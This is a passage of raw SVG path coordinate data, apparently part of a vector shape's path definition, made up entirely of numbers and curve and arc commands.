c1,.1,2.1.2,3.5.3,5.8-.1-4.8-1-1.1-1.2.3.1.6.3,3,.3.1-.3-3-.4-4.7-.7a50.7,50.7,0,0,1,9.7,0c-4.4,1.2,1.3,2.6-6.4,3.8-3.3-.9,6.9-1.6-3.4-2.3,4.2.6-3.8.6,2.3,1a24.24,24.24,0,0,1-3.2.3c-2.1.1-3.8.2-1.6.6-.9-.2.2-.2,1.5-.1,1.1.1,2.4.2,2.8.2a5.67,5.67,0,0,0-2.1.7c7.5.2,4.3,1.1,12.3,1.4-9-1.3.3-2.2,5.8-2.9-2.4-.4-5.6.1-7.2-.3a31.52,31.52,0,0,1,4-.2c7.3.5,5.3.1,12.4,0,2.9.7-6.4.2-6.4.6,1,.3,7.4.9,5.1,1a27.09,27.09,0,0,1-3.1-.3,17.94,17.94,0,0,0-2.4.4c3.2,0,5.4.1,5.9.4-7-.1-11.7,0-12,.6a41.09,41.09,0,0,1,4.3.1c-2.9.3-2.3.9-5.9,1.2,4.8.3.3.5,3.6,1-6.5-.2,1.2,1-4.8.9,1.1,0,1.7.1,1.6.3,14,.5,3.4-1.4,11.2-1.5-.4.6,3.3.5,4.4.2,7.8,1-10,1.5-1.2,1.8-.2.3-7.2.8-3.5.8,1.9-.5,1.1-.1,7,0,2.9,0-3.7-.8.6-.9,2,.1,1.6.8,3.2.5-1.4-.5-.2-.5-3.5-.8,1.5-.1,5.2-.1,6.8-.2-1.2-.2-6.9-.1-6-.5,15.1.2,5.5-1.5,12.2-1.9,5.5,1.7,2,3,3.6,4.1a9.06,9.06,0,0,1,2.8.1l.3.3c-3.3-.1-5.4-.1-7,0,3.6.5-2.9.4-3.5.8,4,.9,2.2,3-1,3.6-.2.5,3.4,2.5-5.9,2.8,2.1.1,5.2.1,5.8.2a31.82,31.82,0,0,0-5.1,2.1c1.9.1,5.4,0,5.8.2-1.2.2-5.1.1-6.7.3,9.3.8-4.7,1.1,1.8,2,6.9,0,1.8-.4-.4-.4a4,4,0,0,1,2.3-.5c.2.5,2.2,0,4.3.1,1.81.2,1.91.3.41.4,11.19.3.19-1.1,0-1.6s10.4,0,9.09-.7a35.68,35.68,0,0,0-4,.1c-2.19-.5-5.59-1.2.1-1.4,1.2.4,6,.2,5.5-.1-3.5-.3-1.7-.4-5-.9,6.9.5.7-.6,8.3,0-.5-.6-4.19-.3-6.19-.7,5.6-.2-1.1,0-1.8-.5,2.8,0,2.5-.3,5.59,0,.6-.6-4-1.1-1.3-1.4-2-.2-4.4-.3-6-.5,1.5-.4,2.9-.8,1.5-1.5,10.8.3,8.9-1.4,16.6-1.7-1.7-.1-4-.1-4.4-.2.2-.3,8.2,0,3.8-.5-4.9-.2-1.4.4-6.8.2-1.9-.6-6.4-1.7-3.4-2.3-1.4.3,5.5.7,6.1.6-2.4-.3-6-.6-6.5-1,1.9.2,5.3.2,7.3.4,1.4-.6-2.8-1.3-1.5-1.7,1.6.1,2.3.2,3,.3,2,.8-3.9,1.9,3.6,2.5-2.8-.8,3.8-1.7-1.1-2.8,7.9.2-3.7-1.5,5.5-1.6-7.2-1.3-3.3-3.2,2.1-3.9a14.11,14.11,0,0,0,2.9.2c-.4-.3-1.3-.5-3.4-.7-.1.1-.2.3-2.6.2-.7-.8,1.2-.9.1-1.4,2.1.1,3.7.2,5.9.4-2.5-.7,4.1-.6,1.6-1.3-3.9,0-3.7.3-7.1-.2a27.6,27.6,0,0,0,5.3-.3c-2.3-.3-5.8.1-7.3-.4.4-.7-1.2-.7-2.7-1.5,5.6.2,4.7-.5,9.6-.1.3-.7,3.6-.7-2.5-1.3,4.4.3,5.4-.1,10,.3.1-.2-1.8-.3-1.8-.5-3.1,0-7.5.1-8.6-.3,2-1.1,6.3-2.5-1.7-3.5,2.5,0,4.4.1,5.8.2-.2-.2-.3-.4-.5-.6-3.6,0-5.2-.2-4.6-.4,6.1.4,2.5-.2,8.31,0,4.09.6-1.5.9-2.91,1.5,7.9.4,6.31,1.6,2.5,1.9,7.9-.3,6.81-1.8,4-2.4,3.2-.6,7.5-1.1,8.1-1.9a20,20,0,0,1-4.5-.4c-4.4-.2-4,.1-8.4-.1-1.7.4,4.1.3,3.3.6-6.9-.3-3.09.4-9.59.1.8-.5,6.4-1.1-1.31-1.4-.19-.2-.3-.4-.5-.6,1.9.2,5.31.2,7.31.4.19-.6-7.5-.1-7.6-.7,2.3-.2,5.69-.1,1-.4,4.5-.2,7.8.4,9.9.2-2.4-.1-3-.8-.7-.8a28.18,28.18,0,0,1,5.8.3c-7.3-.3,1.2.7.9,1-2,.1-5.7,0-6.8.2,6.9.2,1.1.6.7.8,9.1.1,6.7-.6,7.6-.8,4.4.1,1.3.4,6.19.7-1.59-.5-5.9-1,.41-1.1-3.7-.1.69-.7-6.2-.7-1.7.3,4.4.7.6.7-6.7-.6.3-.7,1.8-1-4.7-.2-.8.3-5.5.1-.1-.1-1.3-.2-1.6-.3-.9-.6,2.2-.6,6.1-1-1.1-.3-2.1.1-4.2,0-.1-.2-.9-.3-1.7-.4a29.51,29.51,0,0,1,5.4-.2c3.7.1,1.5.5,6,.5-1.5-.5-2-.6.6-.9-1.5-.3-6.2-.3-6.1-.7.2-.2,3.6-.1,3.8-.3-2.2-.2-4.4-.9-1.2-1.3-2.9-.2-4-.5-6.2-.7-1,.5,2.5.8-2,.9-.8-.1-1.7-.3-3.1-.4,0,.3,2.5.4,3.3.6-8.8-.3-.5.7-3.6.7-1.9-.1-2.8-.2-5.8-.2,4.2.7,6.8,1.7-1.1,1.9,8.3.1,2.8,1.2-3.7.6.5.6,4.2.3,6.2.7-2.6,0-3.3.2-6.9.1-8.2-1.2-2.7-1.7,3.4-2.4-4.5-.8-1.7-1-4.1-1.5,1.4,0,2.8.1,4.3.1-3.9-.2-2.3-1.3-6.5-1,3.7.3,1.7,1-1.9.9-1.6-.7,1.5-1-.1-1.7a29,29,0,0,0,6.9-.1c-8.3-.2-6.2-.8-1.9-.6-1.9-1,3.8-1.9-1.4-3.2,5.4-.1,5.3-.7,1.7-1.2a41.25,41.25,0,0,1,4.3.2c-1.9-.5,1.1-.5,3.7-.6-4.2-.5-4.8.3-7,0a13.65,13.65,0,0,1,5-.7c-.1-.8-5.1-2.5.1-3.1-5-.8-7.6-4.5,1.6-2.9.7-.7-2-1.7-2-2.2,1,.6.7-.2,5.7.1-1.5-.4-2.1-.4.9-.5-6.7-.2,1.7-.7-3.7-1.1.1.1-1,.1-1.4,0h8.3c3.9.4,1.1.4,3.5.8,4.8-.1,4.7.2,8.7.4-3.4-1.5-1.3-1.2.7-2.4-5.2-.2-1.3.5-5.2.4-.2-.2-.3-.4-.5-.6-2.6,0-4.7,0-5.5.1,5.2.1-.6.3,4.6.5-1.1.1-.7.4-5.4.2-.5-.2.9-.5-3.2-.5,1.3.3,2.5.6-.8.6-5.4-.7.6-2-5.4-3,4.6-.2,5.6-2.2-2-2.3,3.1-.2,2.2-.1,6.8-.2,1.8.4-2.1,1.1,3.9,1.3-1.4-.5-3.7-1.3,3.6-.7,0-.3-4.5-.4-4.7-.7,1.9,0,3.8.1,5.7.1.1.2.2,1.1,3.4.7-4.1-.3-.4-.7.6-.9-3-.3-4.9-1.5,2.9-1.5,1.6.1,2.3.2,3,.3-.1.4-3.7.8.9,1a58,58,0,0,1-7.1-.2c-.1.5,4.3.2,6,.5-2.8.1-5.6.2-.9.5,4.3-.2,7.2-2,1.7-2.8,5.5-.3-5.2-1.9,9.6-1.7-1.6-.3-1.3-.9,3.4-.9.7-.3-4.1-.3-3.3-.6,2.6-.6,8.2-.3,16.3-.4-7.9-.2-7.2-1-3.9-1.3a21.78,21.78,0,0,1,3,.3c4.5-.3-7.8-.8-.8-.9,4.4-.1,2.5.7,4.4.3-3.6-.5,4.1-.4-2.1-.8.7-.2,4.1-.1,5.4-.2-5.9-.4-6.3-2.4,3.9-1.9-6.5-2.2,6.1-4.8,5.3-6.6,2.7.1,6.1.2,6,.5-1.9,0-6.3,0-1,.4-.4-.2,1.2-.2,4-.1,2,.4-3.7.6.8.9.3-.3,1.7-1,1.7-1.3-1.5-.1-6.6-.2-8.8-.5,10.4.4.7-.4,5.1-.5,2.3.4,8.5.3,5.6,0,.1.3-4.7-.1-4.4-.2,1.2-.4,14.8-.2,9.1-.7-3.4-.1,1.2.5-4,.2-5.8-.3.3-.7.5-1-8.6-.4-11.4-1-9.7-1.5.7.5,2.7.3,7.3.4-.1-.7-2.1-1.2,2.7-1.7.5.2,0,1.1,2.1.8-2.1-.6,3.6-.5,6.8-.2-3.1-.6,2.5-.5-2.3-1,1.8,0,1.8-.1,4.2,0s3.4.3,3.2.5c5.9-.2,6.5-.3,10.6-.6-3.7-.2-4,.3-5.6,0,1.2-.4-3.4-.5-3.5-.8,6.7.2,3.8-.5,6.4-.6,6.4.6-4.8.8,2.5,1.3-.3-.3,1.6-.6,6.6-.4,1.1.3-1.1.8,2.19.9,2.2-.5-.69-1,8.9-.9-6.3-.3-.4-.9-5.4-1.4,2.7-.1,2.81.1,5.6,0-2.69-.4,4.8-.3.9-.5.1.3-4.69-.1-4.4-.2,3.6.1,2.5-.3,2.31-.6,4.4.2,4-.1,8.4.1-5.1-1.2,5.4-1.7,3.09-2.8,2,0,7.4.3,7,0-4.3-.3-5.8-.7-3.59-1a21.48,21.48,0,0,1,3,.3c2.91-.4-1.4-2.1,8.6-1.3-4.5-.5-8-1.6.2-1.3-1.3-.4-6.5-.2-7.3-.4,11.4-.8,2.1-2.3,8.8-3.2,6.2,1,4.4.1,5.3-.1-1.7-.3-2.3-.6-3.6-.9,0-.1-.4-.2-1.8-.4-.3-.1-.7-.1-1.1-.2.2,0,.4.1.6.1-.4,0-.7-.1-1.2-.1a31.52,31.52,0,0,1,4-.2l1.2.3a1.25,1.25,0,0,1-.6-.1c0,.3.1.6,2.4,1-.19-.2-.1-.2.1-.3a3.88,3.88,0,0,1,1.6,1,4.91,4.91,0,0,1-.5-.1c.2,0,.3.1.5.1a.79.79,0,0,1,.2.7h0c0,.1-.1.3-.1.4a5.54,5.54,0,0,0-1-.2c-3.2-.2.1.8-2.5.8a24.16,24.16,0,0,1,4.3.9c-3.1-.5-4-.2-1.8.4-2.1-.1-3.4-.7-5.2-.8,2.8.5,2.5,1.1,3.5,1.2,0-.1.2-.2,2,.1,2.1.5-.7.2.3.7,3.91.7,1.6-.2,3.91.1-.81.5,3.19.6,3.19.6,4.1,1-1.4.4-3.9,0,4.1.6,7.5,1.6,8.3,1.3-4.4-.9,1.7-.1-2.5-1.2a21.08,21.08,0,0,0,4.1.5c-2.2-.6-4.4-.5-5.4-1.1,1.4-.7,10.6,1.5,9.7,2.1,2.1.1,1.4,0,.7-.5,3.6,1,2.4.2,4,.3,1.3.4,1.1.6,1.3.9a5.08,5.08,0,0,1-.8.3,3.07,3.07,0,0,0-1-.2c.5.3.3.4,0,.5-.5.1-1.1.3-1.7.4,1.3.7,1.6,1.4,1.7,2-.2,0-.4-.1-.6-.1,1.5-.3-1.3,0-5.2-.9.3.2-.2.4,1.3.7.1-.7,2.5,1,4.2.8-2-.4-1.1-.4.4-.3a1.52,1.52,0,0,0,.1.6c-1.2,0-2.8-.1-3.1.2,1.5.3,2.6.5,3.3.7a3,3,0,0,0,.4.7h-1.09a10.53,10.53,0,0,0,1.4.3,5,5,0,0,0,1.1.7c-.7,0-2.91-.4-3.1-.3,4,.8-.1.4,3.4,1.1a19.63,19.63,0,0,0-2-.2,13.53,13.53,0,0,0-2.3-.7c-.91,0-1.1,0-.91.1-3.8.7,8.1,2.3-3.09,2.4a5.23,5.23,0,0,0-1.31-.1c-2.1-.4-1.69-.7-4.69-1.2a11.09,11.09,0,0,0,3.5,1.2c-.1-.2,1.8.2,2,.1a4,4,0,0,1-.5-.1c6.4.4,2,.5.5.9,3.9.2,6,.5,1.9.6,9.5.6,1.8-.5,3.19-1.1a9,9,0,0,0,3.1,0c.2.1.5.2.9.4.7-.1,4,1,5.5,1.4,1.1-.4-6.5-2.1-.69-1.6a12.16,12.16,0,0,0,4.3.9c-1.3-.4-2.8-.8-4.4-1.2-.9-.6,1.5-.4,2.69-.4-1.59-.3-3.8-.6-4.3-.8h.4c1.31.3,2.81.6,4.7,1,.8,1.5,4.6,3.6,1.8,5.2,10.7-.4-2.6-2.5,7-3.1,1.9.1,4.1.2,6.1.2.5.2.3.3,3.1.6-2.1-.1.4.5,1.3.9,1.5-.4,1.6-1,1.5-1.6a87.43,87.43,0,0,1,12.3-.9c-2.4-1.2,3.31-2.2,10.5-2.8-.8.3-1.8.5-.2,1-.09-.1.31-.2,1,.1.31.4-5.19-.7-5-.3,2.5.5,4.31.3,5.2.8-3.5-.3.1.2,1.3.7-2.19-.2-1.69.3-3.9-.1,7.5,2.1-1.3,1.5.2,2.5-3.9-.6-3.8-.2-4.9,0,3.9.7,1.7-.3,5,.3-1.4.8,3.8,3.1,7,4.6-2.8-.4-2.2-.6-4.3-.9-.6.3,4.1.9,4.5,1.3-4.3-.2-10.3-.5-3.3,1.2.1-.2-.6-.5.8-.3.1.3,5.7,2.1.8,1.7a39.85,39.85,0,0,1-4.4-1.1c1.4.2,1.8.1,1.9-.1-3.3-.5-2.9-.8-5.4-1.2-1.3.2,3,.7,2.4,1-2.9-.5-2.2-.6-4.2-.7,2.4.6,3.1,1.4,5.6,1.6-4.5-.5,2.4,1.6-2.4,1.2-2.7-.5,2.5-.2-2.4-.9-.6.1-.4.5.5,1,4.6.9-1-.4,2,.1,4.6.7,3.8,1.7,6.7,1.9-4.4-1.4.2-1.5-4-2.3,2.8.2,3.2-.2,6.9.3,0,.4.5.4,1.6,1.3-3.1-.4-10.1-.8-1.6.6-1-.6.7-.4,2.9-.1-2.3,0,3.5,1.1.4,1,4.6.7.8-.8-.6-1.2,1.3.2,1.5.4,3.2.6-2.5-1.8.9-2.1,4.6-2.7-5.4-.9-3.1.2-8-.6a8,8,0,0,0-1.2-.4c3.3.5,3.4.2,2.8-.3,3.6.6,4.4.5,6.1.7-7.1-1.7-3-2-1.1-2.3a20.39,20.39,0,0,1,2.2.6c1.2-.5.7-1-2.7-1.7,2.2.4-2.7-1.1.6-.7.7.2,3.4,1,4.2.8-3.2-.7-3.4-1.3-3.8-1.8a25,25,0,0,0,5.1.5c-1.8-.6-4.8-.6-6.4-1.2,4.1.4.3-.9,5.6-.4q-4.05-.6-3.3-.9c1.2.2,7,1.4,4.2.7-3.8-.5-3-1.3-.4-.8-.3.8,6.2,1.4,7.9,2.4a16.72,16.72,0,0,0-2-.2c-2.1-.3-1.5-.6-4.3-.9-.3.5-2.9,0,.4,1a25.83,25.83,0,0,1-5.1-.6c-.2.4,5.2,1.1,5.5,1.5s-1.6.1-.7.5c-1.1-.2-2.1-.4-3.1-.5,2.3,1-.2.2,3.5,1.4-1.2.2-4.2-.2-7.1-.6.8.4,5.8.9,6.4,1.3,0,.6,2.2,1.3-.4,1.3-1.7-.3-.7-.4-2.3-.7.1.2.2.3.2.5,3.4.6,3.1.3,5.3.9-3.4-1.8,2.9-1.7-1.6-3.5a45.32,45.32,0,0,1,5.2.8c-1-.7-1.8-1.3-3.3-.9a20.16,20.16,0,0,0-2.3-.8c4.6.8,5,.2,1.8-.3,3.7.6-2.4-.8.9-.2,3.3.4,2.8,1,4.6,1.7,2.9.1-1-1.3-1.9-2,4.7,1.2-.3-.9,2.7-.4,1.8.3,2.5,1.1,4.4,1.1-3.4-1-1.8-1.3-7-2.5,6.9.5-7.2-3.1,1.7-2.5-3.3-.7-1.8-1-.5-1.1,2.4.4-.2.6,4.4,1.2-.5-.5-2.1-1-4.6-1.5.2-.2,2.7.2,2.9,0-1.9-.3-3.9-1.2-2.4-1,1.2.2,1.2.4,1.2.5a10.4,10.4,0,0,0,4,.3c-1.6-.3-3.9-.6-4.3-.8a47.94,47.94,0,0,0,9.8.2c-5.3-.9,1.7-.4-4.5-1.3-.1.4,3.1,1.5-.8.4-2.4-.1,1.8,1-.6.8a15.24,15.24,0,0,1-2.1-.4c-.8-.7,5.2-.1,1.3-1.3-.1.1.3.4-.9.2a8,8,0,0,0-1.2-.4c.3-.2,4,.6,2.9,0-5.6-.6.1-1.1-7.9-2.4,3.8.4-.8-.3-.3-.7a19.35,19.35,0,0,0,2,.2c1.9.3,3.8,1.2,5.4,1.1-2.6-.5.1-.7-3.5-1.2.9.3-1.8.2-2-.1-1.3-.6,6.1.5,1.7-.6a5.55,5.55,0,0,1-2.1-.2c3.1,0,.8-.8,1.4-1.2a16.44,16.44,0,0,0,4.6,1.7c-1-.7.2-.7,2.7-.4-3.7-.7-5.3-.6-6.3-1.2,3.1.5.9-.5,3.9,0-3.6-.4-5.6-1.3-6.4-1.2,3.8,1-2.6-.4-2-.1,1.7.2,2,.9.3.6.3-.2-2.5-1.2-3.4-1.1,2.6.4.4.4-.9.2a4.69,4.69,0,0,1-.6-.2l1.2-.6a13.09,13.09,0,0,0,3.9.1c-1.6-.3-2.6-.4-3.4-.5.3-.2.5-.4.4-.7a11.17,11.17,0,0,0,2.7.8c-1.4-.8-2.1-1.9,1.1-1.7,1.4.9.6.9-1.4,1.1,5.7.9,6.9,1.3,12.8,2.5.6-.3-3.3-1.3-3.5-1.2-1.2.1,4.3,1.1,1.3.7-3-.6-4.9-1-5.5-1.5,3.4.3.5-.4,1.7-.6,4.2.9,2,0,4,.3,2.1.6.2.3.3.6,6.5,1-.1-.5-.4-.8,1.8.3,3.3.6,4.2.8a5.7,5.7,0,0,0-2.3-.8c-1.2.3-9.2-1.6-7.7-1.9a26.05,26.05,0,0,1,5.2.8c.1-.2-1.3-.5-1.3-.7,3.8.7,2.6,0,6.1.6-1.4-.7-.2-.6-3.5-1.2-3-.4-.1.4-1.9.1-1.6-.3-4-1.2-1.4-.9,3.4.6,5.6,1.2,6.2.8-5.4-.6-.8-.3-3.3-.9a41.57,41.57,0,0,1-7.2-.9c-.7-.8,1.5-.6,1.5-1,1.3.5,1.1.9,3.6,1.5,3.7.1-2.3-1.7,2.3-1.3-2.6.1,2.7.9,4.6,1.5,1.3-.1,3.3.7,4.1.6a16.33,16.33,0,0,1-4.4-1.1c3.3.5,4.5.1,7.1.7-1.6-.8-6.3-2.3.2-1.8,1.1.4-3-.1.2.5,0-.1.8,0,1.1.2.5.4-4.8-.9-3-.2,5.3,1,4.4,1.7,7,2.6-2.9-.6-1.9-.1-3-.2a11.42,11.42,0,0,1,3.1.8,3.7,3.7,0,0,0,1.1.1,5.44,5.44,0,0,1-1.1-.3c-.4-.1-.3-.1,0-.1.7,0,2.4.2,1.9,0a6.07,6.07,0,0,1-1.9-.5c-.3-.1-.2-.2,0-.3s1-.3,0-.7a4.76,4.76,0,0,0-.9-.3,3,3,0,0,1,.9.2,18.66,18.66,0,0,1,3.4.7c-.3,0-2.4,0,.2.5.2-.2,1.5-.2.7-.7-1.9-.3-2.5-.5-2.3-.7-.8-.1-1.4-.2-2-.3a14.26,14.26,0,0,1-3.4-.8c1.6.2,2.6.5,3.4.6s1.4.3,1.8.1c-.6-.1-1.2-.3-1.8-.4-3.5-.8-6.3-1.5-9.1-2.2,3.4.7,2.5.2,4.1.5a2.76,2.76,0,0,0,1.2.4c-1.3-.7,2.9.6,3.9.5h0c-6.8-1.3-1.7-.7-6.5-1.9,3.4.7,2.2.5,4.2.6.4.6.3.2,2.4.5.3,0,.5.1.8.1A8.44,8.44,0,0,0,880,5a16.62,16.62,0,0,0-2-.3q-.45,0,0,.3a5,5,0,0,0,1.2.3c.3-.2,5.5.8,6.3,1a20.88,20.88,0,0,0-5.8-2c.7-.4,1.3-.8,5.9.2.3.3-2.2-.1-2.9,0,2.8.9,3.8,1.6,5.9,2.2-1.8-.6,4.4.4,4.1.6-1.3.1-4.4.1-.7.7-5.8-.8-3.1.4-7.9-.3-.3.3,2.8.9,4.5,1.3-2.7-.4-1.5.2-2.9.1a19.45,19.45,0,0,0-5.1-.6c3.2.6-1.6.5,1.3.7a6.05,6.05,0,0,1,1.9,0c-.3.3,1.7.7,2.4,1.1,3.6.6,1.4-.3,6.1.7a2.68,2.68,0,0,1-1.8.3c-.7-.4-1.9,0-4.1-.5,1.6.7.2.6.6,1.2,5.6.9.4-.4,1.6-.7,8,1.3,6.8.2,13.1,1.1-1.2-.6-4.9-1.1-1.4-.9l-5.2-.9c-.3.3,3.3.8,2.4,1.1a8.82,8.82,0,0,1-2.9,0c-.5-.4-1.7-.7-2.6-1.3,3.7.7.9-.4,3.9.1-7.5-1.1-3.6.3-9.8-.3,1.4-.3,2.1-1,9.5-.3-.4-.3-1.7-.2-2.2-.5,1.1.2,1.2,0-.1-.2.6.3-2.5.1-3-.2,1.4-.1,1.4-.5,3.8-.3,2.2.4,1.2.6,3.4,1,.5-.1,1.4,0,1.9-.1-2.1-.4-6.9-1.5-3.4-1.1,1.9,1,1.7-.8,7,.5-.6-.4-3.5-.9-2.5-1.2,4.5,1,1.8.1,4,.3,2.2,1.6,4.5,3.7-2.5,2.9,1.2.9.6,1.1,1.8,1.7,1.4.2,2.3.4,3.2.6-.3-.4,4.5.5,5,.3-3.1-.4-5.1-.7-6.3-1,.7-.2-3.5-1.2-.4-.8,1.3.3,1.4.6,1.4.9,3.9.5,8.6.7,5.7-.3,0,.3.1.6-2.9.1.7-1.2-3.9-3.6,4.7-2.5.9.1,1.8.2,3,.4-4.1-.9,5.8.5.7-.7-1.1-.1-.1.4-3-.2a.74.74,0,0,0-.7-.3,9.16,9.16,0,0,1-2.5-.2c-.1-.2-.2-.5-.3-.7-4.5-.8-3.2,0-7.1-.6,3-.3,15.4.5,4.1-1.5a.26.26,0,0,0-.1-.2c2.5.3,4.5,1.1,5.2.9-1.6-.4-3.4-.7-3.4-1,4.7.8-1.1-.7,1.7-.5l2.4.7c2.5.9,2.4,1.6,1.9,2.1a9.18,9.18,0,0,1,2.2.6c4.2.9,5.2.4,7.3,1.1-2-.1-2-.2.2.4-2.9-.4-3.9-.2-3.7.3,5.7,1-.1-.4,2.9-.1,5.7,2.1-1,1.4,1.4,2.9,4.8,1,2.7,1.1,7.6,1.8-4-.5-6.4-.6-8.4-1.4-.8.2,3.2,1.3,4.5,1.3-.9-.3,2.8.7,3,.2a14.34,14.34,0,0,1,3.5,1.2c-1.9-.1-1.9-.4-5.2-.9-.4.4-.4.3.4.8,1.4.5,3.8.4,5.3,1a25.66,25.66,0,0,0-4.8,0c6.8,1.7,2.8,1.9,3.2,2.8-2.5-.5-7.1-1-4-.3,1.4.1,3.5.3,6.1.7-1.6.1-3.3-.1-.6.8-5.5-.9.3.6-3.8.1,1.6.3,5.4.8,5.3,1a.35.35,0,0,0,.1.2c-3.8-.6-5.1-1.1-8.5-1.6-1.3.2,4.7.8,3.4,1,3,.6,2.6.3,5.2.8-.8.4,3.2,1.6-1.3,1.3,4.1.8,2.2.8,3.5,1.2-.7.1-5.1-.9-4-.3,2,.3,2.4.5,4.2.8.1-.1.2-.2,2,.1,7.5,1.6,2.5,1.8,2.1,2.3-.1.1,5.3,2-1.8.4,1.2.5,2,1.1-2.8.2.5-.1,2.4.1,1.8-.4-3.1-.5-3.7-.9-6.5-1.4,1,.7-3-.7-1.9,0,.5.4,5.2.6,6.4,1.2a8.82,8.82,0,0,1-2.9,0c-.3-.2-2.4-.5-3.3-.8-.5.1-2.5.4-.6.8,1.8.2-.3-.6,1.8-.3s8.7,1.7,2.2.5c-.1.4,6.1,1.1,4.5,1.4a17.2,17.2,0,0,0-3.2-.5c.1.4,2.7.4,4.4,1.1a26.83,26.83,0,0,1-4-.3c3.2.9-1.8,1,4.6,1.5a2.68,2.68,0,0,1-1.8.3.17.17,0,0,1-.23.07.18.18,0,0,1-.07-.23l0,0a.16.16,0,0,1,.23,0h-.6c-.8-.2-1.6-.2-3.6-.6.2.2.3.3.3.4h-.3c-.9.2-.7.3,0,.4a6.32,6.32,0,0,1-1.3.4c2.5.6,3.8.3,4.2.7-2.7-.4,1.5.4.2.5-1.5-.2-3.9-.7-4.1-.6.3.5,2.4,1.4-1.5.9-.6-.3.9-.4-1.3-.8-2.9,0,3,1.3.6,1.2,1.4.2,2.8.5,4.2.7-.1.4,4.1,1.5-2.7.4,2.1-.1-3.8-1.5-7.7-1.9,0,.3.9.9-.6.8,1.5.5,3.1.3,4.2.8-1.6.1,4.4,2.1,2,2.2,2.1.2.6-.5,3.9.1,3.8,1.4-2.7,1.2-1,2.1a12.25,12.25,0,0,1,2.9-.1c1.6.8-1.6.7-1.2,1.6.1.2,1.9.4,2.2.6-.1.5-5.3.2-8.8-.2,7,1.3,6.3.5,9.1.7,2.7,1-2.8.3.6,1.3,1.6.2-.5-.6,2.9,0-2.1-1.3-5-2.8.8-2.4-1.8.4.8.4,3.5,1.2-.2.3-4,.2-2.7.6a5.85,5.85,0,0,1,2,.2c2.5.8-2.3.6.5,1-.2-.2.7-.2,1.9,0,2.7,1.4-1.9,1.2,3.2,2.6-7-1.1,1.5,1.9-5.4.9-.6-1.2.4-1.6-1.2-2.6-2.6-.2-2-.7-3.4-1.1-4.9-.2,1.3,1.7,3.1,2.5-1.3-.2-1.4-.1-3.1-.4.5-.3-2-.8-1.5-1.1-1.8-.2-5.6-.9-5.1-.5,2,.4,2.3.2,4.1.6a7.72,7.72,0,0,1,.4,1c-7-1-6.7-1.2-13.7-2.4,0-.1,1.3.1.9-.2a59.9,59.9,0,0,1-12-3c-2.9-.1,4.1,1.1,2.6,1.4a17,17,0,0,0-3.1-.5c3.3.5.7.7,4.4,1.2q-.45-.45,1.8-.3c.1.2,1.9.4,2.2.6,1.1.5-1.5.1-1.8.3a10.32,10.32,0,0,1,2.2.5c4.2.8-1.3-.6,4,.3,6.7,1.6,14.6,2.5,12.1,3.1-5.3-.6-2.6.3-1.4,1.1-1.4-.2-2.3-.4-3.2-.6-.3.2-2.8.7,1.7,1.5,2.3.4-1.5-.5-.3-.6,3.4.7,1.2-.2,4,.3,1.6,1.2-.5,1-5.7.3.4,1.1-2.3,1.2-2.7,2.6,2.5.6,3.8.3,4.2.7-1.7.1.8.6.5,1.1-1.6-.4-2.6-.6-3.1-.4,3.7,1-3.4,0,2.4,1.1-.3.2-3.2-.2-5-.4,1.4.4,3.9.8,5.4,1.1.5.3,0,.4-.8.4,1.4.4,3.9.8,5.4,1.1-1.1-.6,2-.1,3.9.1.5-.2-1.1-.5-1.4-.7.1,0,.2-.1.3-.1,1.3.2,2.6.4,4,.7.7.5-2.3.1,1.3.8,3.9.2-7.4-2-2.9-2-.5.5,2.8.6,4.4,1.1-.9-.8,9.8-.5,10.1.9,3.6.7,3.7.4,4,.2q-4.05-.6-3.3-.9c-1.9-.4-6.1-.9-6.4-1.2.7-.2,1.7-.4-1.5-1.1,4.7-1,1.1-3.8,2.2-5.6,1,.6,1,.6.4,1,6.1,1,2.7,1,3.5,1.2.9-.2,1.2.5,3.1.5,1,1-.8,1.4,4.2,2.8-.3-.9,6.7,1.5,6.2.8-6.4-1.5-5.3-2.1-1.9-2.1-1.2-.2-3-.5-3.2-.6,3.6.3,3.8,1.1,5.6,1.6A27,27,0,0,0,979,53c1.6.4,3.4.7,3.4,1-.8.3-2.1-.1-.7.7-1.4-.2-2.3-.4-3.2-.6-.1.3,2.5.8,2.4,1.1l-5.3-.9a31.71,31.71,0,0,1,8,2.7c1.6-.4,10.3.2,6.3-1.1,1.8.3,6.3.7,7.3,1.1-2.3.1-3.4-.1-.5.9-1.3-.2-1.5-.4-3.2-.6.4,1-7.2-.8-6.7.2a51.94,51.94,0,0,1,5.5,1.5c.5-.2,4.9.8,5.3,1-2.1-.1-2.7,0,1.2.4-2.3,0-.3,1.3-4.5.8-2.5-.4-3.2-.7-6.4-1.2-3.1-1.1-1.5-1.9-2.2-2.7a37.31,37.31,0,0,0-4.1-.5q3.45.6,3.3.9a52.82,52.82,0,0,1-5.3-.9c.3.3.5.6-1.8.3-.1-.2-.1-.3-.2-.5-5.2-.9-7.1-.4-5.7.2a12,12,0,0,1,3,.2c.3.2,1.8.5,2.3.7-.6.3-3.6-.5-5.1-.5,3,.7-2.3-.3-2-.1,1.6.4,3.4.7,3.4,1-1.6-.2-3.9-.7-4.1-.6,8.6,2.5-5.1.9,2.6,3.4a12.75,12.75,0,0,0-3.9-.1c3.9.6,5.7.7,9.3,1.2-.5-.6-1.4-1.8,3.3-1.2.3.3,2.6,1.1-.6.8,1.6.3,3.9.6,4.3.8-1.8.9,3.4,3.4-.1,3.9.2-.2,4.6.7,5.1.6-4.3-1.1-3.3-1.5.4-1.3-3.7-1.3-2.3-2.3-3.4-3.2,5.8.9,6.7.1,11.1,1,.5-.2-1.8-1.2.5-.9.4.4,3.5.9,4.5,1.3.8-.1,2.2-.1,1.6-.6,2.6.5,3.4.8,4.1.6-.7-1-2.6-2.4,3.8-2.3,6.1,1.2,2.8,1.4,4.9,2.1,1.9-.1,0,.5,2.3.8.1-.3,6.4.8,7.3,1.2-.8.1-2.4,0-6.1-.7.3.3.5.7,3.4,1.1-2.2-1,5.5.8,5.1.5a19,19,0,0,1-3.3-.9c6.1,1,.3-.5-1.5-1,3,.2-4.4-2.3,2.1-1.8,1.4.6,2.5,1,1.5,1.1,4.3.8,6.6,1.5,7.8,2.2-2-.1-2.1-.4-4.3-.8.6.4,6.7,1.9,1.5,1.3a9.61,9.61,0,0,0-3.4-1c3.3,1.2,9.9,2.8,10.3,3.5,1.8.3,3.2.5,4.1.6,2.1,1.4,8.2,3.5,2.3,2.9.9.5-.8.9,1.7,1.5.7-.3,5.8.6,4.9.1a66,66,0,0,0,6.7,2c-2.3-.3-1.5.2-1.8.5-.1.1-.3.1-.9.1a2.7,2.7,0,0,0-.8-.1c-1.2-.3.9-.4-1.5-.7-1.7,0-2.6.2-3,.6-1.1.9,1.1,2.6-3.2,2.7-